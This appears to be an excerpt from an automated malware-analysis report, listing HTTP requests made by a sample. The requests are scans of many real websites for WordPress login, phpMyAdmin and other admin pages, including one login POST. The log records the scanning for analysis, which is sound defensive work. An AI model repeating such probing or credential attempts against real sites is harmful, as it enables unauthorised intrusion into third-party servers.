Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxH\|ZYXxHUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=yuejichem.com
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: apbct_site_landing_ts=1703276096; apbct_site_referer=UNKNOWN; apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522d42136a717107bf800630d3d98c79970%2522%257D; apbct_page_hits=1; apbct_timestamp=1703276096; apbct_urls=%7B%22jaydien.com%2Fwp-login.php%22%3A%5B1703276096%5D%7D; __cf_bm=wO6R3cJEVncRtLKEV4SHGXPRoDw0pQdZkS.rfOvvuAw-1703276097-1-AcuBImzY8taxrcp0ONX7ZpBCi58WXNqX1E7/LU0Wiz3Q/YWa0Ykrpa4kripaE6Dm+O7IHsZGb7jnK1hcopmWyPs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jaydien.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ispsolucoes.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://loghole.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=vixej.com
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://bldowney.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://intermountainmls.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=86e4b7d6ea29f95c56d290863f1c8e26dc3a8af6-1703276096; __cf_bm=uEwfLfFM0U2S_jMIcw4hEMEZwjd6P6W7VgrMYlzdcWA-1703276096-1-AayFdb5cfFZ2I1c/fqE/KXib6eMU2roQFgGGaVAZSXccxHdNNamEIjLLwbtF8SZWlzYnLsgTP4u91SsVZ9kMWE8=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=866846e4a95d698d2be97b497286681aad8ceca0-1703276099; __cf_bm=eY0D4_k8OQFfy9Ngj9OEED_OD7i433V95SWpFgrxatk-1703276099-1-Ad32xSe9y5tGH8uGN7JyLksEBAE/1nxR4yoWSeYxZ0LVDYUL568m6NQnzeumzLRGTwUx8RBLc0RdHXYTmnRpRTQ=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cannaclear.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wordpress/wp-login.php?redirect_to=https%3A%2F%2Fbldowney.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=dab9654e76fcb87f013f9734233b1b7aUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://bldowney.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //PhpMyAdmin/ HTTP/1.1Host: trivandrum.german.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.wika.co.inAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cannaclear.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=vixej.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxI\|ZYXxIUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=dcgpfec9qqpM41jIjob1ZSgbyJF7hmAh9UuUDPOQm2Y-1703276101-1-AX+K0BviUO3qmKPmlE4Clrq5Uptbru8RwPz6ZJN42KPlSV16HTOV4MUCE7vH63XZ9lAyF0wuO6dhvmvbhMQk/Bs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipCookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=HjiJGtjSbkOb_mOJXPP9wzC_xzRlEub0zC2nnAEGs4Y-1703276101-1-AdD76OTw88m1809C/x2Xgx8g5LRKBcubp/SLUvgQwRq93WYgcmG7/aOz5aBWU/9sb4T9JN+5QmfEGqo1Y7motmc=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipCookie: __cf_bm=OzJqjiqHKt6aRbfNvBsKgVdCu_YtKZh4WwGGmG0c.Fk-1703276101-1-AUiI9rA1VB1zODFwTJl3fKqJYVylp2HfLPK9Tyeky1yQxNv2z5D8PKgtXuujpkunUZ5tbQx2WJDb4/+UW8Drc+4=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET //phpMyAdmin/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc3\|ZYXxI\|ZYXxIUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/login HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipCookie: SERVERID=vpc4\|ZYXxI\|ZYXxIUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=t3bhc4ud222ni4dqk308a6qgnlUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 134Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: www.valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /index.php/ HTTP/1.1Host: www.flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=dcgpfec9qqpM41jIjob1ZSgbyJF7hmAh9UuUDPOQm2Y-1703276101-1-AX+K0BviUO3qmKPmlE4Clrq5Uptbru8RwPz6ZJN42KPlSV16HTOV4MUCE7vH63XZ9lAyF0wuO6dhvmvbhMQk/Bs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1Host: www.hugedomains.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: www.liberty25.orgAccept: /Accept-Encoding: deflate, gzipCookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=HjiJGtjSbkOb_mOJXPP9wzC_xzRlEub0zC2nnAEGs4Y-1703276101-1-AdD76OTw88m1809C/x2Xgx8g5LRKBcubp/SLUvgQwRq93WYgcmG7/aOz5aBWU/9sb4T9JN+5QmfEGqo1Y7motmc=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
